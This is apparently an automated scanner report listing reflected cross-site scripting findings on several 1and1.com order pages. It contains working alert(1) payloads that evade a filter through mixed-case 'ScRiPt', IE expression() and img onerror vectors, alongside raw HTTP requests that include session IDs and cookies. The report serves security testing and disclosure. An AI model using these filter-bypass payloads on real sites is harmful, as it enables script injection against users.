This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/Hosting2a1d6</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>596a15d5308;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10
Request 2
GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10
The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload af2f1</ScRiPt%20>54b667825a6 was submitted in the REST URL parameter 3. This input was returned as af2f1</ScRiPt >54b667825a6 in a subsequent request for the URL /xml/order/Hosting.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload f884f</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89d857b9fc1 was submitted in the REST URL parameter 3. This input was returned as f884f</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89d857b9fc1 in a subsequent request for the URL /xml/order/Hosting.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of REST URL parameter 3 submitted to the URL /xml/order/Instant is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Instant. The payload 92e84</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>9555bc59727 was submitted in the REST URL parameter 3. This input was returned as 92e84</ScRiPt ><ScRiPt>alert(1)</ScRiPt>9555bc59727 in a subsequent request for the URL /xml/order/Instant.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/Instant92e84</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>9555bc59727;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/MailInstantMail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/MailInstantMail. The payload 17be3</ScRiPt%20>4a6827ab2d was submitted in the REST URL parameter 3. This input was returned as 17be3</ScRiPt >4a6827ab2d in a subsequent request for the URL /xml/order/MailInstantMail.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/MailInstantMail17be3</ScRiPt%20>4a6827ab2d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/MsHosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/MsHosting. The payload 9d4af</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>542f10c1a1e was submitted in the REST URL parameter 3. This input was returned as 9d4af</ScRiPt ><ScRiPt>alert(1)</ScRiPt>542f10c1a1e in a subsequent request for the URL /xml/order/MsHosting.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/MsHosting9d4af</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>542f10c1a1e;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10
Request 2
GET /xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10
The value of REST URL parameter 3 submitted to the URL /xml/order/Service is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Service. The payload 2eb97</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>359b8a2e72d was submitted in the REST URL parameter 3. This input was returned as 2eb97</ScRiPt ><x style=x:expression(alert(1))>359b8a2e72d in a subsequent request for the URL /xml/order/Service.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/Service2eb97</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>359b8a2e72d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/Service;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/Sharepoint is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Sharepoint. The payload 2f20e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>1ed21c34ec was submitted in the REST URL parameter 3. This input was returned as 2f20e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>1ed21c34ec in a subsequent request for the URL /xml/order/Sharepoint.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/Sharepoint2f20e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>1ed21c34ec;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/VirtualServerL is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/VirtualServerL. The payload dddff</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>d0fee8f5448 was submitted in the REST URL parameter 3. This input was returned as dddff</ScRiPt ><img src=a onerror=alert(1)>d0fee8f5448 in a subsequent request for the URL /xml/order/VirtualServerL.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of REST URL parameter 3 submitted to the URL /xml/order/popupDomainPrices is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/popupDomainPrices. The payload 753b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>63529f6639f was submitted in the REST URL parameter 3. This input was returned as 753b5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>63529f6639f in a subsequent request for the URL /xml/order/popupDomainPrices.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/popupDomainPrices753b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>63529f6639f;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
